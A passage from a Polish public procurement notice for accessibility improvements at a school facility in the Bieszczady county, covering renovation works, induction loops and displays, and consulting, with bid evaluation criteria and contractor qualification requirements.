ościeżnic stalowych szt. 3,<br/>-Wykuciu otworów w ścianach pod nowe elementy stolarki drzwiowej,<br/>-Rozebraniu istniejących ścian działowych z cegły<br/>- Rozebraniu wykładziny ściennej z płytek<br/>- Demontażu istniejącej armatury,<br/>- Demontażu przewodów wodociągowych z rur,<br/>- Demontażu rurociągów w ścianie,<br/>Wykonanie zamurowani w ścianach z bloczków z betonu komórkowego na zapracie cementowo- wapiennej<br/>-Wykonanie tynków,<br/>- Szpachlowanie tynków,<br/>- 2 krotne malowanie powierzchni farbami emulsyjnymi z 2 krotnym gruntowaniem,<br/>- Wykonanie nowych rurociągów i wraz z zaworami przelotowymi i zwrotnymi,<br/>- Wykonanie nowych ościeżnic i drzwi drewnianych,<br/>- Wykonanie nowych ościeżnic i drzwi aluminiowych,<br/>- Wykonanie nowych opraw oświetleniowych,<br/>- Wykonanie łączników i przycisków jednobiegunowych podtynkowych,<br/>- Zaprawienie bruzd<br/>- Wykonanie przewodów kablowych<br/>Szczegółową charakterystykę prac i zakres robót uwzględniono w załączonym kosztorysie, przedmiarze robót oraz rysunkach.<br/> <br/>Budowa podjazdu:<br/> <br/>- Rozebranie nawierzchni chodników z betonu gr. 15cm,<br/>- Wykonanie robót ziemnych,<br/>- Wywóz gruzu,<br/>- Wykonanie warstwy odsączającej,<br/>- Wykonanie podbudowy,<br/>- Wykonanie nawierzchni s kostki brukowej betonowej gr. 6cm,<br/>- Wykonanie Palisady betonowej na ławie betonowej z oporem,<br/>- Wykonanie balustrady ze stali nierdzewnej chromowanej z pochwytem podwójnym.<br/> <br/>Szczegółową charakterystykę prac i zakres robót uwzględniono w załączonym kosztorysie, przedmiarze robót oraz rysunkach.<br/><br/>OPZ dla tej części stanowią załączniki: <br/><br/>Numer załącznika	Nazwa załącznika<br/>2.1	Dokumentacja techniczna<br/>2.2	OPZ dla części II<br/>2.3	Wzór umowy <br/><br/><br/>Zadanie sfinansowane w ramach:<br/><br/>1) Program „Dostępny samorząd – granty; <br/>2) Program wyrównywania różnic pomiędzy regionami III; <br/>3) Budżet Powiatu Bieszczadzkiego; <br/><br/>Wykonawca wyłoniony w drodze przetargu zobowiązany jest do: <br/><br/>1) urządzenia i zagospodarowanie placu i zaplecza budowy, <br/>2) zapewnienia we własnym zakresie zasilania w energię elektryczną oraz dostawę wody technologicznej i spożywczej, a także możliwość podgrzewania napojów i posiłków, <br/>3) utrzymania zaplecza budowy, <br/>4) przywrócenia terenu do stanu pierwotnego w miejscach nie przewidzianych pod roboty <br/>inwestycyjne a zajętych w trakcie robót, <br/>5) sporządzenia operatu kolaudacyjnego, który ma zawierać: umowy z ewentualnymi <br/>podwykonawcami i dalszymi podwykonawcami, protokół przekazania terenu budowy, <br/>protokoły odbioru robót, komplet atestów, certyfikatów i aprobat technicznych na <br/>wbudowane materiały budowlane, końcowy protokół odbioru, oświadczenie <br/>uprawnionego kierownika robót o wykonaniu zadania zgodnie z przepisami, <br/>powykonawczej inwentaryzacji geodezyjnej oraz wszystkie niezbędne dokumenty do <br/>przekazania obiektu do użytkowania,<br/>6) uwzględnienia w wykonywaniu robót zakresów zadań i kolizji występujących w pozostałych częściach zamówienia, <br/>Wykonawca wyłoniony w drodze przetargu zobowiązany jest do: <br/>7) Niepogorszenia stanu budynku oraz placu przy budynku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wynagrodzenie wykonawcy jest wynagrodzeniem ryczałtowym.<br/><br/>2. Sposób obliczenia ceny określa formularz oferty stanowiący Załącznik nr 8 do SWZ oraz kosztorysy pomocnicze składane dla poszczególnych części zamówienia.<br/><br/>XXV. Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>Dla części 1,2,3<br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/>2. Kryterium „okres gwarancji”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „okres gwarancji”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>P = B / M x 40,00<br/><br/>gdzie:<br/><br/>D- liczba punktów w kryterium<br/>B – liczba miesiecy w ofercie badanej <br/>M- największa zaoferowana liczba pobytów z pośród złożonych ofert <br/><br/>Wykonawca podaje okres gwarancji w liczbach całkowitych oraz słownie w formularzu oferty stanowiącym załącznik nr 8 do SWZ. <br/><br/>Okres gwarancji nie może być krótszy niż 36 miesięcy oraz dłuższy niż 84 miesiące. <br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji dłuższego niż 84 miesiące:<br/><br/>a) do oceny ofert zostanie przyjęty okres gwarancji wynoszący 84 miesięcy,<br/>b) do umowy zostanie wpisany okres gwarancji podany w formularzu oferty.<br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji krótszego niż 36 miesięcy, oferta tego wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp („Zamawiający odrzuca ofertę, jeżeli jej treść jest niezgodna z warunkami zamówienia”).<br/><br/>Dla części 4<br/><br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/><br/>2. Kryterium „doświadczenie osób skierowanych do realizacji zamówienia”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „doświadczenie osób skierowanych do realizacji zamówienia”: <br/><br/>udział w prowadzeniu 1 – 3 usług doradczych – 5 pkt <br/>udział w prowadzeniu 4 – 7 – usług doradczych – 15 pkt <br/>udział w prowadzeniu 8 – 10 – usług doradczych – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3. Dostawa i montaż wyposażenia dla Bieszczadzkiego Zespołu Placówek Szkolno Wychowawczych <br/><br/>Zakup pętli indukcyjnych (6 szt.) – pętla indukcyjna zostanie ulokowana przy nowoutworzonej recepcji spełniającej standardy dostępności tj. w części o obniżonej wysokości dostępnej dla osób na wózkach inwalidzkich. <br/>Pozostałe pętle indukcyjne dedykowane będą poszczególnej kondygnacji budynku i wykorzystywane w przypadku wystąpienia takiej potrzeby.<br/>Zakup pętli indukcyjnych służyć będzie wspomaganiu słuchu i zwiększeniu komfortu słyszenia osób słabosłyszących, które korzystają z aparatu słuchowego oraz implantów słuchowych. Zakup ten umożliwi w szczególności sprawną komunikację z uczniami placówki. Montaż planowanych do zakupu pętli indukcyjnych będzie przeprowadzony w sposób umożliwiający łatwy demontaż i nie będą one w sposób trwały związane z nieruchomością.<br/>Minimalne parametry techniczne i funkcjonalności: <br/>- przenośny system pętli z możliwością instalacji stałej, <br/>- wskaźnik LED natężenia pola magnetycznego, <br/>- wyświetlacz ładowania LED,<br/>- wyposażona w zewnętrzny mikrofon stojący,<br/> - zewnętrzna słuchawka kompatybilna z aparatami słuchowymi, <br/>- akumulator Ni-MH 1,2V 600mA z możliwością ponownego ładowania. <br/><br/>Zakup multimedialnych tablic informacyjnych (4 szt.) – tablice informacyjne w formie monitorów zostaną umieszczone w obszarze recepcji oraz w kluczowym punkcie węzłowym – miejscu przecięcia korytarzy, zmiany ich kierunku, zapewniając w ten sposób prezentowanie informacji na temat rozkładu pomieszczeń w budynku dla osób o szczególnych potrzebach oraz dostępnych formach komunikacji wykorzystywanych w Zespole Szkół. Wyposażenie placówki w multimedialne monitory zapewni informowanie uczniów i ich opiekunów o dostępnych formach komunikacji oraz umożliwią wizualną prezentację rozkładu pomieszczeń w budynku, co znacząco ułatwi poruszanie się osób o szczególnych potrzebach. Montaż planowanych do zakupu multimedialnych tablic informacyjnych będzie przeprowadzony w sposób umożliwiający łatwy demontaż i nie będą one w sposób trwały związane z nieruchomością.<br/>Minimalne parametry techniczne i funkcjonalności:<br/>- rozmiary ekranu (przekątna) 65&#34; <br/>- rozdzielczość 4K Ultra HD (3840 × 2160) <br/>- jasność 400 cd / m² <br/>- wyposażony z funkcję SMART <br/>- konfigurowalny ekran główny <br/>- możliwość udostępniania ekranu w oparciu o aplikacje - pamięć 32 GB <br/><br/>OPZ dla tej części stanowią załączniki: <br/><br/>Numer załącznika	Nazwa załącznika<br/>3.1	OPZ dla części III<br/>3.2	Wzór umowy <br/><br/>Zadanie sfinansowane w ramach: <br/><br/>1) Program „Dostępny samorząd – granty; <br/>2) Program wyrównywania różnic pomiędzy regionami III; <br/>3) Budżet Powiatu Bieszczadzkiego; <br/><br/>Obowiązki Wykonawcy: <br/><br/>Dostawa powinna obejmować: transport, ubezpieczenie na czas transportu, rozładunek, wniesienie oraz ustawienie przedmiotu zamówienia w pomieszczeniach wskazanych przez Zamawiającego, a także (jeżeli dotyczy) jego instalację i uruchomienie oraz w przypadku sprzętu elektronicznego również wstępne przeszkolenie.<br/><br/>Oferowany przedmiot zamówienia musi być fabrycznie nowy, w I gatunku, nieuszkodzony, wolny od wad fizycznych i prawnych, w pełni sprawny i funkcjonujący bez jakichkolwiek zakłóceń oraz zastrzeżeń, pozbawiony praw i obciążeń osób trzecich, a także odpowiadający obowiązującym normom i posiadający niezbędne certyfikaty i atesty zgodnie z obowiązującymi przepisami prawa, które zostaną przekazane Zamawiającemu przed podpisaniem protokołu odbioru. <br/><br/>Wykonawca dostarczy przedmiot zamówienia kompletny posiadający wszelkie kable, materiały eksploatacyjne, podzespoły itp., niezbędne do jego prawidłowego użytkowania, gotowy do uruchomienia i użytkowania bez dodatkowych nakładów i zakupów. <br/><br/>Wykonawca dostarczy przedmiot zamówienia dopuszczony do obrotu i stosowania w krajach UE.<br/><br/>Wykonawca będzie zobowiązany dostarczyć wraz z przedmiotem zamówienia instrukcje obsługi w języku polskim (jeśli dotyczy).<br/><br/>Wykonawca będzie zobowiązany do dołączenia do każdego przedmiotu zamówienia objętego gwarancją karty gwarancyjnej (jeżeli dotyczy).<br/><br/>Wykonawca dostarczy przedmiot zamówienia na koszt własny.<br/><br/>Do wszystkich ujętych w zamówieniu systemów operacyjnych i programów wymagane jest dołączenia nośników a także instrukcji instalacji i obsługi oraz certyfikatów potwierdzających prawo Zamawiającego do korzystania z Oprogramowania w ramach niniejszego zamówienia (jeżeli dotyczy).<br/><br/>Wykonawca zapewni Zamawiającemu dostęp do aktualizacji sterowników za pośrednictwem serwisu internetowego (jeżeli dotyczy).<br/><br/>Wykonawca wskaże okres gwarancji udzielonej na zaoferowany sprzęt (jeżeli dotyczy).<br/><br/>Minimalny wymagany przez Zamawiającego okres gwarancji liczony jest od dnia podpisania protokołu odbioru, <br/><br/>W okresie gwarancji (w ramach zaoferowanych cen jednostkowych). Wykonawca zobowiązany będzie do zapewnienia ewentualnych przeglądów okresowych (termin przeglądu musi zostać każdorazowo uzgodniony z zamawiającym), jeżeli są one wymagane przez producenta sprzętu oraz wykonywania napraw w siedzibie Zamawiającego lub wymieniać na nowy, wolny od wad - w przypadku wystąpienia uszkodzeń powstałych na skutek wad materiałowych, wykonania lub innych wad ukrytych, w terminie nie dłuższym niż 5 dni od dnia zgłoszenia telefonicznego/faksem/mailem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32320000-2 - Sprzęt telewizyjny i audiowizualny</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32323000-3 - Monitory wideo</p> <p class="mb-0">33185000-0 - Aparaty słuchowe</p> <p class="mb-0">32340000-8 - Mikrofony i głośniki</p> <p class="mb-0">32342400-6 - Sprzęt nagłaśniający</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wynagrodzenie wykonawcy jest wynagrodzeniem ryczałtowym.<br/><br/>2. Sposób obliczenia ceny określa formularz oferty stanowiący Załącznik nr 8 do SWZ oraz kosztorysy pomocnicze składane dla poszczególnych części zamówienia.<br/><br/>XXV. Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>Dla części 1,2,3<br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/>2. Kryterium „okres gwarancji”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „okres gwarancji”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>P = B / M x 40,00<br/><br/>gdzie:<br/><br/>D- liczba punktów w kryterium<br/>B – liczba miesiecy w ofercie badanej <br/>M- największa zaoferowana liczba pobytów z pośród złożonych ofert <br/><br/>Wykonawca podaje okres gwarancji w liczbach całkowitych oraz słownie w formularzu oferty stanowiącym załącznik nr 8 do SWZ. <br/><br/>Okres gwarancji nie może być krótszy niż 36 miesięcy oraz dłuższy niż 84 miesiące. <br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji dłuższego niż 84 miesiące:<br/><br/>a) do oceny ofert zostanie przyjęty okres gwarancji wynoszący 84 miesięcy,<br/>b) do umowy zostanie wpisany okres gwarancji podany w formularzu oferty.<br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji krótszego niż 36 miesięcy, oferta tego wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp („Zamawiający odrzuca ofertę, jeżeli jej treść jest niezgodna z warunkami zamówienia”).<br/><br/>Dla części 4<br/><br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/><br/>2. Kryterium „doświadczenie osób skierowanych do realizacji zamówienia”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „doświadczenie osób skierowanych do realizacji zamówienia”: <br/><br/>udział w prowadzeniu 1 – 3 usług doradczych – 5 pkt <br/>udział w prowadzeniu 4 – 7 – usług doradczych – 15 pkt <br/>udział w prowadzeniu 8 – 10 – usług doradczych – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4. Realizacja usług doradczych z zakresu dostępności w ramach projektu „Dostępny Samorząd”. <br/><br/>Realizacja usługi doradczej z zakresu zwiększania dostępności usług publicznych świadczonych przez BZPSW. <br/><br/>Celem tej usługi jest określenie obszarów, rozwiązań i konkretnych działań, które przyczynią się do poprawy dostępności placówki. Usługa doradcza z zakresu zwiększania dostępności usług publicznych, umożliwi określenie obszarów, rozwiązań i konkretnych przyszłych działań, które przyczynią się do poprawy dostępności placówki. <br/><br/>Realizacja usługi umożliwi uszczegółowienie planu działania na rzecz poprawy zapewnienia dostępności osobom ze szczególnymi potrzebami i zaplanowanie nowych inwestycji z uwzględnieniem osób o szczególnych potrzebach. <br/>OPZ dla tej części stanowią załączniki: <br/><br/><br/>4.1	OPZ dla części IV<br/>4.2	Wzór umowy dla części IV </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71241000-9 - Studia wykonalności, usługi doradcze, analizy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wynagrodzenie wykonawcy jest wynagrodzeniem ryczałtowym.<br/><br/>2. Sposób obliczenia ceny określa formularz oferty stanowiący Załącznik nr 8 do SWZ oraz kosztorysy pomocnicze składane dla poszczególnych części zamówienia.<br/><br/>XXV. Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>Dla części 1,2,3<br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/>2. Kryterium „okres gwarancji”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „okres gwarancji”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>P = B / M x 40,00<br/><br/>gdzie:<br/><br/>D- liczba punktów w kryterium<br/>B – liczba miesiecy w ofercie badanej <br/>M- największa zaoferowana liczba pobytów z pośród złożonych ofert <br/><br/>Wykonawca podaje okres gwarancji w liczbach całkowitych oraz słownie w formularzu oferty stanowiącym załącznik nr 8 do SWZ. <br/><br/>Okres gwarancji nie może być krótszy niż 36 miesięcy oraz dłuższy niż 84 miesiące. <br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji dłuższego niż 84 miesiące:<br/><br/>a) do oceny ofert zostanie przyjęty okres gwarancji wynoszący 84 miesięcy,<br/>b) do umowy zostanie wpisany okres gwarancji podany w formularzu oferty.<br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji krótszego niż 36 miesięcy, oferta tego wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp („Zamawiający odrzuca ofertę, jeżeli jej treść jest niezgodna z warunkami zamówienia”).<br/><br/>Dla części 4<br/><br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/><br/>2. Kryterium „doświadczenie osób skierowanych do realizacji zamówienia”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „doświadczenie osób skierowanych do realizacji zamówienia”: <br/><br/>udział w prowadzeniu 1 – 3 usług doradczych – 5 pkt <br/>udział w prowadzeniu 4 – 7 – usług doradczych – 15 pkt <br/>udział w prowadzeniu 8 – 10 – usług doradczych – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla części 1.<br/><br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej, jeżeli wykaże, że:<br/><br/>1) Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności technicznej, jeżeli <br/>wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - <br/>w tym okresie, wykonał 1 umowę na roboty budowlane polegającą na budowie, <br/>przebudowie lub remoncie obiektu kubaturowego o wartości co najmniej 200 000,00 zł <br/>brutto oraz załączy dowody, że została ona wykonana należycie.<br/><br/>oraz<br/><br/>2) dysponuje lub będzie dysponował co najmniej jedną osobą na stanowisku kierownika robót - posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami w specjalności konstrukcyjno-budowlanej, posiadającym doświadczenie na stanowisku kierownika budowy min. 5 lat. <br/><br/><br/><br/><br/>Dla części 2.<br/><br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej, jeżeli wykaże, że:<br/><br/>W okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie <br/>wykonał co najmniej 1 robotę budowlaną polegającą na remoncie budynku o wartości min.:<br/><br/>40 000,00 zł brutto<br/>Dla części 3.<br/><br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej, jeżeli wykaże, że:<br/><br/>W okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał min. 1 dostawę sprzętu multimedialnego o wartości min. 20 000 zł brutto. <br/><br/>Dla części 4.<br/><br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej, jeżeli wykaże, że:<br/><br/>dysponuje lub będzie dysponował:<br/><br/>a) co najmniej 2 osobami posiadającymi wykształcenie wyższe; <br/>b) co najmniej 1 osobą posiadającą min. 4-letnie doświadczenie w dziedzinie doradztwa w zakresie dostępności audytowania dostępności architektonicznej, cyfrowej lub informacyjno-komunikacyjnej; <br/>c) co najmniej 1 osobą posiadająca w swoim portfolio minimum 3 audyty systemów teleinformatycznych pod kątem spełniania standardów WCAG 2.0 lub nowszych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.<br/><br/>oraz<br/><br/>Oświadczenie dotyczące wykluczenia związanego z przeciwdziałaniem wspieraniu agresji Federacji Rosyjskiej na Ukrainę - składane zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla cz. 1<br/><br/> W celu wykazania, że Wykon. spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej:<br/><br/>wykaz robót wykonanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy roboty te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy- zał. nr 7 do SWZ. <br/><br/>W celu wykazania, że Wykon. spełnia warunek udziału w postępowaniu dotyczący zdolności zawodowej:<br/><br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zał. nr 8 do SWZ.<br/> <br/>Dla cz. 2<br/><br/>W celu wykazania, że Wykon. spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej:<br/><br/>wykaz robót wykonanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy roboty te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a w przypadku 